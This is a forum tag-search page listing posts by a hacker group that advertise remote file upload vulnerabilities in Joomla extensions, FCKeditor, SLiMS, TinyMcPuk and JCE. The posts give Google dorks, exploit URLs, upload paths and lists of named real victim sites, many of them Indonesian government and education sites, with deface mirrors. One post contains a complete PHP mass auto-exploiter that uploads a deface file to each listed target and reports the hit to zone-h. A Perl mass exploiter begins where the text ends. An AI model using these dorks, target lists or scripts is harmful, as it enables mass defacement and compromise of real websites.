Search the forums

Showing results for the tag 'upload'.

50 results found

  1. # Exploit Title : Joomla Com_BibleStudy Proclaim MediaFileForm Remote File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Vendor Homepage : joomlabiblestudy.org ~ extensions.joomla.org/extension/proclaim/ # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CVE: CVE-2018-7316 # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] # CXSecurity : cxsecurity.com/ascii/WLB-2018090270 # Cyberizm : cyberizm.org/cyberizm-joomla-com-biblestudy-proclaim-mediafileform-exploit.html ################################################################################################# # Google Dork : inurl:''/index.php?option=com_biblestudy'' # Exploit : TARGET/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 # Note : Go to the '' Media Files '' Category. Choose your File and Upload it. # Directory File Path : TARGET/images/biblestudy/media/.... ################################################################################################# # Example Vulnerable Sites => kalamekhuda.com/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 => [ Proof of Concept for Vulnerability and Proof of Mirror ] => archive.is/nfskL => archive.is/5NaKe hereatcalvary.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 [ Proof of Concept ] => archive.is/oEPx3 cclivinghope.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  2. # Exploit Title : Developed by Rate it Services Business Solutions Mājas lapu izstrāde FCKeditor Remote File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Vendor Homepage : rate.lv # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060245 # Cyberizm : cyberizm.org/cyberizm-developed-by-rateit-services-business-solutions-exploit.html ################################################################################################# # Title : Developed by Rate Business Solutions Mājas lapu izstrāde Latvia FCKeditor Remote File Upload Vulnerability # Google Dorks : intext:''Developed by: RATE Business Soltuions'' intext:''Developed By: Mājas lapu izstrāde'' intext:''Developed by: RATE IT SERVICES'' # Exploit : /jscripts/editor/filemanager/connectors/uploadtest.html # Path : /allfiles/... ################################################################################################# # Example Vulnerable Sites : There are 31 domains hosted on this server. => 178.16.24.19 btp.travel/jscripts/editor/filemanager/connectors/uploadtest.html => [ Proof of Concept ] => archive.is/HWzoL => archive.is/s2AaH behold.lv/jscripts/editor/filemanager/connectors/uploadtest.html hotelsinpl.com/jscripts/editor/filemanager/connectors/uploadtest.html bhyper.com/jscripts/editor/filemanager/connectors/uploadtest.html hotelsinwarsaw.eu/jscripts/editor/filemanager/connectors/uploadtest.html gobaltic.com/jscripts/editor/filemanager/connectors/uploadtest.html eursecure.com/jscripts/editor/filemanager/connectors/uploadtest.html ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  3. #Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Remote File Upload Exploit #Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Team #Vendor Homepage : slims.web.id #Software Download Link : github.com/slims/ * slims.web.id/web/ * slims.web.id/goslims/ #Affected Version : 5/6/7 #Tested on : Windows / Linux #Exploit Risk : High #CXSecurity : cxsecurity.com/ascii/WLB-2018050260 #Cyberizm : cyberizm.org/cyberizm-slims-senayan-library-management-system-indo-exploit.html ############################################################################################################## # Long Exploit Title : Slims CMS Senayan OpenSource Library Management System The Winner in the Category of OSS Indonesia ICT Award 2009 Arbitrary File Upload Vulnerability and Auto Exploiter #Short Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Exploit Description : SLiMS (Senayan Library Management System) is a free and open source Library Management System. It is build on free and open source technology like PHP and MySQL. SLiMS provides many features such as bibliography database, circulation, membership management and many more that will help "automating" library tasks. Features : Online Public Access Catalog (OPAC) with thumbnail document image support (can be use for book cover), Simple Search and Advanced Search mode Digital contents/files (PDF, DOC, RTF, XLS, PPT, Video, Audio, etc.) 
attachment in each bibliographic record support Documents record detail in MODS (Metadata Object Description Schema) XML format RSS (Really Simple Syndication) XML format for OPAC OAI-PMH (Open Archives Initiative Protocol for Metadata Harvesting) in Dublin Core format for metadata harvesting purpose Bibliographic/catalog database management with book cover image support Serial publication control Document items (book copies) management with barcode support Master Files management to manages document referential data such as GMD, Collection Types, Publishers, Authors, Locations, Authors and Suppliers Circulation support with following sub-features : Loan and Return transaction Collections reservation Quick return Configurable and flexible Loan Rules Membership management Stock Taking module to help Stock Op name process in library Reporting and Statistics System modules with following sub-features : Global system configuration Modules management Application Users and Groups management Holiday settings Barcodes generator utility Database backup utility Responsive user interface 3rd party bibliographic records indexing support with Sphinx Search and MongoDB Demo Version : softaculous.com/softaculous/demos/SLiMS Admin Username: admin Admin Password: pass ############################################################################################################## #Slims CMS Senayan OpenSource Library Management System File Attachment Arbitrary File Upload Vulnerability Original Affected Code Here => # Example Affected Code from slims5_meranti [ Original Vulnerability Code ] => [/code]<?php /** * Copyright (C) 2007,2008 Arie Nugraha (dicarve@yahoo.com) * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. 
* * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA * */ /* Biblio file Adding Pop Windows */ // key to authenticate define('INDEX_AUTH', '1'); // key to get full database access define('DB_ACCESS', 'fa'); // main system configuration require '../../../sysconfig.inc.php'; // IP based access limitation require LIB_DIR.'ip_based_access.inc.php'; do_checkIP('smc'); do_checkIP('smc-bibliography'); // start the session require SENAYAN_BASE_DIR.'admin/default/session.inc.php'; require SENAYAN_BASE_DIR.'admin/default/session_check.inc.php'; require SIMBIO_BASE_DIR.'simbio_GUI/table/simbio_table.inc.php'; require SIMBIO_BASE_DIR.'simbio_GUI/form_maker/simbio_form_table.inc.php'; require SIMBIO_BASE_DIR.'simbio_DB/simbio_dbop.inc.php'; require SIMBIO_BASE_DIR.'simbio_FILE/simbio_file_upload.inc.php'; require SIMBIO_BASE_DIR.'simbio_FILE/simbio_directory.inc.php'; // privileges checking $can_write = utility::havePrivilege('bibliography', 'w'); if (!$can_write) { die('<div class="errorBox">'.__('You are not authorized to view this section').'</div>'); } // page title $page_title = 'File Attachment Upload'; // check for biblio ID in url $biblioID = 0; if (isset($_GET['biblioID']) AND $_GET['biblioID']) { $biblioID = (integer)$_GET['biblioID']; } // check for file ID in url $fileID = 0; if (isset($_GET['fileID']) AND $_GET['fileID']) { $fileID = (integer)$_GET['fileID']; } // start the output buffer ob_start(); /* main content */ // biblio topic save proccess if (isset($_POST['upload']) AND trim(strip_tags($_POST['fileTitle'])) != '') { $uploaded_file_id = 0; $title = 
trim(strip_tags($_POST['fileTitle'])); $url = trim(strip_tags($_POST['fileURL'])); // create new sql op object $sql_op = new simbio_dbop($dbs); // FILE UPLOADING if (isset($_FILES['file2attach']) AND $_FILES['file2attach']['size']) { // create upload object $file_dir = trim($_POST['fileDir']); $file_upload = new simbio_file_upload(); $file_upload->setAllowableFormat($sysconf['allowed_file_att']); $file_upload->setMaxSize($sysconf['max_upload']*1024); $file_upload->setUploadDir(REPO_BASE_DIR.DIRECTORY_SEPARATOR.str_replace('/', DIRECTORY_SEPARATOR, $file_dir)); $file_upload_status = $file_upload->doUpload('file2attach'); if ($file_upload_status === UPLOAD_SUCCESS) { $file_ext = substr($file_upload->new_filename, strrpos($file_upload->new_filename, '.')+1); $fdata['uploader_id'] = $_SESSION['uid']; $fdata['file_title'] = $dbs->escape_string($title); $fdata['file_name'] = $dbs->escape_string($file_upload->new_filename); $fdata['file_url'] = $dbs->escape_string($url); $fdata['file_dir'] = $dbs->escape_string($file_dir); $fdata['file_desc'] = $dbs->escape_string(trim(strip_tags($_POST['fileDesc']))); $fdata['mime_type'] = $sysconf['mimetype'][$file_ext]; $fdata['input_date'] = date('Y-m-d H:i:s'); $fdata['last_update'] = $fdata['input_date']; // insert file data to database @$sql_op->insert('files', $fdata); $uploaded_file_id = $sql_op->insert_id; utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'bibliography', $_SESSION['realname'].' upload file ('.$file_upload->new_filename.')'); } else { echo '<script type="text/javascript">'; echo 'alert(\''.__('Upload FAILED! 
Forbidden file type or file size too big!').'\');'; echo 'self.close();'; echo '</script>'; die(); } } else { if ($url && preg_match('@^(http|https|ftp|gopher):\/\/@i', $url)) { $fdata['uploader_id'] = $_SESSION['uid']; $fdata['file_title'] = $dbs->escape_string($title); $fdata['file_name'] = $dbs->escape_string($url); $fdata['file_url'] = $dbs->escape_string($fdata['file_name']); $fdata['file_dir'] = 'literal{NULL}'; $fdata['file_desc'] = $dbs->escape_string(trim(strip_tags($_POST['fileDesc']))); $fdata['mime_type'] = 'text/uri-list'; $fdata['input_date'] = date('Y-m-d H:i:s'); $fdata['last_update'] = $fdata['input_date']; // insert file data to database @$sql_op->insert('files', $fdata); $uploaded_file_id = $sql_op->insert_id; } } // BIBLIO FILE RELATION DATA UPDATE // check if biblio_id POST var exists if (isset($_POST['updateBiblioID']) AND !empty($_POST['updateBiblioID'])) { $updateBiblioID = (integer)$_POST['updateBiblioID']; $data['biblio_id'] = $updateBiblioID; $data['file_id'] = $uploaded_file_id; $data['access_type'] = trim($_POST['accessType']); $data['access_limit'] = 'literal{NULL}'; // parsing member type data if ($data['access_type'] == 'public') { $groups = ''; if (isset($_POST['accLimit']) AND count($_POST['accLimit']) > 0) { $groups = serialize($_POST['accLimit']); } else { $groups = 'literal{NULL}'; } $data['access_limit'] = trim($groups); } if (isset($_POST['updateFileID'])) { $fileID = (integer)$_POST['updateFileID']; // file biblio access update $update1 = $sql_op->update('biblio_attachment', array('access_type' => $data['access_type'], 'access_limit' => $data['access_limit']), 'biblio_id='.$updateBiblioID.' 
AND file_id='.$fileID); // file description update $update2 = $sql_op->update('files', array('file_title' => $title, 'file_url' => $url, 'file_desc' => $dbs->escape_string(trim($_POST['fileDesc']))), 'file_id='.$fileID); if ($update1) { echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment data updated!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php?biblioID='.$updateBiblioID.'\');'; echo '</script>'; } else { utility::jsAlert(''.__('File Attachment data FAILED to update!').''."\n".$sql_op->error); } } else { if ($sql_op->insert('biblio_attachment', $data)) { echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment uploaded succesfully!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php?biblioID='.$data['biblio_id'].'\');'; echo '</script>'; } else { utility::jsAlert(''.__('File Attachment data FAILED to save!').''."\n".$sql_op->error); } } utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'bibliography', $_SESSION['realname'].' 
updating file attachment data'); } else { if ($uploaded_file_id) { // add to session array $fdata['file_id'] = $uploaded_file_id; $fdata['access_type'] = trim($_POST['accessType']); $_SESSION['biblioAttach'][$uploaded_file_id] = $fdata; echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment uploaded succesfully!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php\');'; echo '</script>'; } } } // create new instance $form = new simbio_form_table('mainForm', $_SERVER['PHP_SELF'].'?biblioID='.$biblioID, 'post'); $form->submit_button_attr = 'name="upload" value="'.__('Upload Now').'" class="button"'; // form table attributes $form->table_attr = 'align="center" id="dataList" cellpadding="5" cellspacing="0"'; $form->table_header_attr = 'class="alterCell" style="font-weight: bold;"'; $form->table_content_attr = 'class="alterCell2"'; // query $file_attach_q = $dbs->query("SELECT fl.*, batt.* FROM files AS fl LEFT JOIN biblio_attachment AS batt ON fl.file_id=batt.file_id WHERE batt.biblio_id=$biblioID AND batt.file_id=$fileID"); $file_attach_d = $file_attach_q->fetch_assoc(); // edit mode if ($file_attach_d['biblio_id'] AND $file_attach_d['file_id']) { $form->addHidden('updateBiblioID', $file_attach_d['biblio_id']); $form->addHidden('updateFileID', $file_attach_d['file_id']); } else if ($biblioID) { $form->addHidden('updateBiblioID', $biblioID); } // file title $form->addTextField('text', 'fileTitle', __('Title').'*', $file_attach_d['file_title'], 'style="width: 95%; overflow: auto;"'); // file attachment if ($file_attach_d['file_name']) { $form->addAnything('Attachment', $file_attach_d['file_dir'].'/'.$file_attach_d['file_name']); } else { // file upload dir // create simbio directory object $repo = new simbio_directory(REPO_BASE_DIR); $repo_dir_tree = $repo->getDirectoryTree(5); $repodir_options[] = array('', __('Repository ROOT')); if (is_array($repo_dir_tree)) { // sort array by index 
ksort($repo_dir_tree); // loop array foreach ($repo_dir_tree as $dir) { $repodir_options[] = array($dir, $dir); } } // add repo directory options to select list $form->addSelectList('fileDir', __('Repo. Directory'), $repodir_options); // file upload $str_input = simbio_form_element::textField('file', 'file2attach'); $str_input .= ' Maximum '.$sysconf['max_upload'].' KB'; $form->addAnything(__('File To Attach'), $str_input); } // file url $form->addTextField('textarea', 'fileURL', __('URL'), $file_attach_d['file_url'], 'rows="1" style="width: 100%; overflow: auto;"'); // file description $form->addTextField('textarea', 'fileDesc', __('Description'), $file_attach_d['file_desc'], 'rows="2" style="width: 100%; overflow: auto;"'); // file access $acctype_options[] = array('public', __('Public')); $acctype_options[] = array('private', __('Private')); $form->addSelectList('accessType', __('Access'), $acctype_options, $file_attach_d['access_type']); // file access limit if set to public $group_query = $dbs->query('SELECT member_type_id, member_type_name FROM mst_member_type'); $group_options = array(); while ($group_data = $group_query->fetch_row()) { $group_options[] = array($group_data[0], $group_data[1]); } $form->addCheckBox('accLimit', __('Access Limit by Member Type'), $group_options, !empty($file_attach_d['access_limit'])?unserialize($file_attach_d['access_limit']):null ); // print out the object echo $form->printOut(); /* main content end */ $content = ob_get_clean(); // include the page template require SENAYAN_BASE_DIR.'/admin/'.$sysconf['admin_template']['dir'].'/notemplate_page_tpl.php';[/code] ############################################################################################################## #Short Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Exploit #Google Dork 1 : intext:''The Winner in the Category of OSS Indonesia ICT Award 2009'' #Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id 
#Google Dork 3 : inurl:''/slims5-meranti/'' site:id #Google Dork 4 : intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009'' #Google Dork 5 : Powered by SLiMS site:id #Google Dork 6 : Powered by SLiMS | Design by Indra Sutriadi Pipii #Google Dork 7 : Beranda Depan · Info Perpustakaan · Area Anggota · Pustakawan · Bantuan Pencarian · MASUK Pustakawan. #Google Dork 8 : Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog. #Google Dork 9 : SLiMS (Senayan Library Management System) is an open source Library Management System. It is build on Open source technology like PHP and MySQL. #Google Dork 10 : PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly This software and this template are released Under GNU GPL License Version 3 #Google Dork 11 : inurl:''/index.php?select_lang='' site:sch.id #Google Dork 12 : Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog #Google Dork 13 : Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library. #Google Dork 14 : O.P.A.C. (On-line Public Access Catalogue) #Google Dork 15 : inurl:''/perpustakaan/repository/'' site:id #Google Dork 16 : Senayan | Open Source Library Management System :: OPAC Note : Use your brain to find more dorks. Note : Please upgrade and update your site on the latest versions of SLİMS Senayan Library Management System and do not let special characters or add admin in the next version. #Exploit Code : ..../admin/modules/bibliography/pop_attach.php #Path : /repository/.... # Note : Fill the form and choose your file and upload it. # Allowed File Extensions : txt jpg gif png #Indonesian Government / Education Sites are vulnerable for this issue. #Attackers can exploit this issue via a browser or with Auto PHP Exploiter tool. 
############################################################################################################## #Auto Exploiter PHP Code => [code]<?php /* # KingSkrupellos from Cyberizm Digital Security Team # Our Security Forum : cyberizm.org # Twitter : twitter.com/kngskrplls # your list.txt must a single directory with this exploiter # ############################################### # This Exploit and Vulnerability was discovered by KingSkrupellos # Thanks for All Moslem Hackers and Cyberizm Digital Security Team # This Exploiter may sometimes couldn't work %100 because sometimes the bot don't understand the command. # If the command don't understand the command, please exploit it manually. # Special thanks : All Moslem Hackers and Cyberizm Digital Security Team ################################################# # note : Please do not remove Cyberizm copyright. # This Exploit Coded By KingSkrupellos from Cyberizm Digital Security Team */ echo " File Attachment Auto Exploiter - coded by KingSkrupellos $ Thanks for All Moslem Hackers and Cyberizm Digital Security Team "; echo "Input your target list: "; $list = trim(fgets(STDIN)); $shell = "yourdefacefilename.txt"; $nickzoneh = "KingSkrupellos"; $exploit = "/admin/modules/bibliography/pop_attach.php"; $path = "/repository/"; $open = fopen("$list","r"); $size = filesize("$list"); $read = fread($open,$size); $lists = explode("\r\n",$read); echo "\n"; foreach($lists as $target){ if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){ $targets = "http://$target"; }else{ $targets = $target; } echo "Target => $targets\n"; echo " [*] Checking Path : "; $cd = curl_init("$targets$exploit"); curl_setopt($cd, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($cd, CURLOPT_RETURNTRANSFER, 1); curl_exec($cd); $httpcode = curl_getinfo($cd, CURLINFO_HTTP_CODE); curl_close($cd); if($httpcode == 200){ echo "200 OK\n"; echo " [*] Uploading shell : "; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 
"$targets/$exploit"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, array("fileTitle"=>"CyBeRiZM" , "file2attach"=>"@$shell" , "upload"=>"Unggah Sekarang")); curl_exec($ch); $cek = curl_init(); curl_setopt($cek, CURLOPT_URL, "$targets$path$shell"); curl_setopt($cek, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($cek, CURLOPT_RETURNTRANSFER, 1); $ceek = curl_exec($cek); $ceeks = curl_getinfo($cek, CURLINFO_HTTP_CODE); if(preg_match("/hacked/",$ceek) or $ceeks == 200){ echo "OK $targets$path$shell\n"; echo " [*] Zone-H : "; $zh = curl_init("http://zone-h.org/notify/single"); curl_setopt($zh, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($zh, CURLOPT_RETURNTRANSFER, 1); curl_setopt($zh, CURLOPT_POST, 1); curl_setopt($zh, CURLOPT_POSTFIELDS, array("defacer"=>"$nickzoneh","domain1"=>"$targets$path$shell","hackmode"=>"18","reason"=>"5")); $postzh = curl_exec($zh); if(preg_match("/color=\"red\">OK<\/font><\/li>/i",$postzh)){ echo "OK\n\n"; }else{ echo "NO\n\n"; } }else{ echo "Failed\n\n"; } }else{ echo "Not Vulnerable\n\n"; } }[/code] Important Note : Only .txt .jpg .gif .png files are allowed. # Uploaded File Directory Path : TARGET/PATH/repository/.... TARGET/repository/.... 
############################################################################################################## # Example Sites : # perpustakaan.pn-bangli.go.id/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/dAL3j => archive.is/Ott9S # pta-banjarmasin.go.id/perpustakaan/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/lPDdv => archive.is/BNiKP # pn-singaraja.go.id/opac/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/veBCj - archive.is/GEOy6 pn-singaraja.go.id/opac/admin/modules/bibliography/pop_attach.php pa-kualatungkal.go.id/pustaka/admin/modules/bibliography/pop_attach.php pta-banjarmasin.go.id/perpustakaan/admin/modules/bibliography/pop_attach.php pn-bangil.go.id/perpustakaan/data/admin/modules/bibliography/pop_attach.php pn-tabanan.go.id/perpustakaan/admin/modules/bibliography/pop_attach.php perpustakaan.pn-balige.go.id/admin/modules/bibliography/pop_attach.php docrepository.undana.ac.id/admin/modules/bibliography/pop_attach.php digilib.stimata.ac.id/admin/modules/bibliography/pop_attach.php pustaka.pusair-pu.go.id/akasia/admin/modules/bibliography/pop_attach.php perpustakaan.pn-donggala.go.id/admin/modules/bibliography/pop_attach.php perpustakaan.stikes-paguwarmas.ac.id/admin/modules/bibliography/pop_attach.php opac.staiattanwir.ac.id/repository/admin/modules/bibliography/pop_attach.php opac.lib.idu.ac.id/library_unhan/admin/modules/bibliography/pop_attach.php www.perpustakaanbalitsereal.com/admin/modules/bibliography/pop_attach.php epository.hafshawaty.ac.id/admin/modules/bibliography/pop_attach.php perpusffup.univpancasila.ac.id/admin/modules/bibliography/pop_attach.php perpus.stikesmedikacikarang.ac.id/slim/admin/modules/bibliography/pop_attach.php rbaca.bukitasamfoundation.com/perpustakaan/admin/modules/bibliography/pop_attach.php e-library.darunnajah.ac.id/admin/modules/bibliography/pop_attach.php 
############################################################################################################## # Discovered By Hacker KingSkrupellos from Cyberizm Digital Security Technological Turkish Moslem Army ##############################################################################################################
  4. # Indonesia Official CarDealer MediaTech TinyMcPuk Filemanager Arbitrary File Upload Vulnerability # Author : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army # Vendor Homepage => mediatechindonesia.com # Google Dork => All rights reserved. © 2015 Media Tech Indonesia # CWE-264 - [ Permissions, Privileges, and Access Controls ] # CXSecurity : cxsecurity.com/ascii/WLB-2018050180 # Cyberizm : cyberizm.org/cyberizm-indo-cardealer-mediatech-tinymcpuk-filemanager-exploit.html ################################################################################# Exploit => ...../tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash You can check if the vulnerability still exists via => ...../tinymcpuk/plugins/flash/flash.htm Please upload your file as => /yourfilename.htm.fla Your File Here [ Path ] => /tinymcpuk/gambar/Flash/......htm.fla ################################################################################# Example Sites and Target IP => 103.27.206.203 daihatsusidoarjo.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukipedia.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash toyotaterpercaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash promosidoarjodaihatsu.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash promomobiltoyotasurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash promomobiltoyotasidoarjo.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash promomobiltoyotajatim.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash salestoyotagresik.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash 
saleshondasurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash swalayanrak.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukiwarusurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukiumcsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukisbtsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukisbtmalang.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukipedia.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukimurahsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukimobilsurabaya.net/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukimobilsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash surabayadaihatsu.info/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash surabayadaihatsu.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash umcsuzukipasuruan.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash umcsuzukijatim.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukipedia.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash Example Mirror [ Proof of Concept ] => zone-h.org/mirror/id/31184406 ################################################################################# Discovered By : KingSkrupellos from Cyberizm.Org #################################################################################
5. # Exploit Title : Joomla Content Editor JCE Image Manager Auto Mass Exploiter and Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army
# Vendor Homepage : joomlacontenteditor.net
# Software Download Link : joomlacontenteditor.net/downloads / extensions.joomla.org/extension/jce/
# Exploit Risk : High
# CWE-264 - [ Permissions, Privileges, and Access Controls ]
# CXSecurity [ Author : KingSkrupellos ] : cxsecurity.com/ascii/WLB-2018050200
# Cyberizm : cyberizm.org/cyberizm-joomla-content-editor-jce-auto-mass-exploiter.html
#################################################################################
Exploit Title : Joomla Content Editor JCE ImageManager Vulnerability Mass Auto Exploiter

Google Dork [ Example ] => inurl:''/index.php?option=com_jce''

You can search all plugins and themes to find more sites. Most of them have the JCE plugin installed [ 40% or more ]. Use your brain.

Explanation for Joomla Content Editor JCE => [ ScreenShot ] https://cdn.pbrd.co/images/Hmx6KZC.jpg

JCE makes creating and editing Joomla!® content easy... Add a set of tools to your Joomla!® environment that gives you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS...
Office-like functions and familiar buttons make formatting simple
Upload, rename, delete, cut/copy/paste images and insert them into your articles using an intuitive and familiar interface
Create Links to Categories, Articles, Weblinks and Contacts¹ in your site using a unique and practical Link Browser
Easily tab between WYSIWYG, Code and Preview modes.
Create Tables, edit Styles, format text and more...
Integrated Spellchecking using your browser's Spellchecker
Fine-grained control over the editor layout and features with Editor Profiles

Media Manager => Upload and insert a range of common media files including Adobe® Flash®, Apple Quicktime®, Windows Media Player® and HTML 5 Video and Audio. Easily insert Youtube and Vimeo videos - just paste in the URL and Insert! Insert HTML5 Video and Audio with multiple source options.

Image Manager Extended => Create a thumbnail of any part of an image with the Thumbnail Editor. Insert multiple images. Create responsive images with the srcset attribute. Create image popups in a few clicks - requires JCE MediaBox or a compatible Popup Extension.

Filemanager => Create links to images, documents, media and other common file types. Include a file type icon, file size and modified date. Insert as a link or embed the document with an iframe. Create downloadable files using the download attribute.

Template Manager => Insert pre-defined template content from html or text files. Create template snippet files from whole articles or selected content. Configure the Template Manager to set the startup content of new articles.
#################################################################################
Severity: High

[ ScreenShot for JCE Editor ] => https://cdn.pbrd.co/images/HmypA0v.png

This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.

The component is prone to the following security vulnerabilities:

1. A cross-site scripting vulnerability, because it fails to sufficiently sanitize user-supplied input to the 'search' parameter of the 'administrator/index.php' script.
2. A security-bypass vulnerability, due to an error in the 'components/com_jce/editor/extensions/browser/file.php' script.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Affected : JCE 2.1.0 is vulnerable; other versions may also be affected.

References => https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27481
References => https://www.securityfocus.com/bid/53630

Note : This Joomla JCE issue is not the previous exploit that goes to this path => ..../images/stories/......php => NOT

This JCE issue is well known to some hackers, but other hackers know nothing about this vulnerability. So this is the new one.

TARGETSITE/yourfilename.png .gif .jpg
or
TARGETSITE/images/yourfilename.html .php .asp .jpg .gif .png
#################################################################################
Notes =>

Joomla Content Editor JCE Toggle Editor / Image Manager behind the Administration Panel [ ScreenShot ] => https://cdn.pbrd.co/images/Hmx6KZC.jpg

An attacker cannot reach this image manager without a username and password for the control panel. But there is a little trick to upload an image or a file through this vulnerability: an attacker must run it with remote file upload code.

Watch Videos from Original Sources =>

Install JCE Editor in Joomla! 2.5 Tutorial
[video=youtube]https://www.youtube.com/watch?v=oQdyi_xKJBk[/video]

Joomla 3 Tutorial #7: Using the Joomla Content Editor (JCE) Tutorial
[video=youtube]https://www.youtube.com/watch?v=fI0_S-T1gK8[/video]

How to Update / Upgrade a Joomla! Page that uses JCE, the Joomla Content Editor. Fix the Bugs for this Vulnerability
[video=youtube]https://www.youtube.com/watch?v=X6h5kcAxvu0[/video]
#################################################################################
You can check with these exploit URLs in your browser whether the sites are vulnerable, for testing the security. You will see some errors.
Exploit => ....../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20
{"result":{"error":true,"result":""},"error":null}

Exploit => ...../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
or giving this error => {"result":null,"error":"No function call specified!"}

Exploit => /component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/
{"result":null,"error":"No function call specified!"}

Path => TARGETSITE/yourfilename.png gif jpg
or
TARGETSITE/images/yourfilename.png gif jpg html txt
#################################################################################
Auto Mass Exploiter Perl =>

[code]#!/usr/bin/perl
# JCE Mass Auto Exploiter by KingSkrupellos (Cyberizm Digital Security Team), as posted.
# Reads a list of sites, probes the imgmanager plugin endpoint and tries to POST a file to it.
use Term::ANSIColor;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common qw(POST);

$ua = LWP::UserAgent->new(keep_alive => 1);
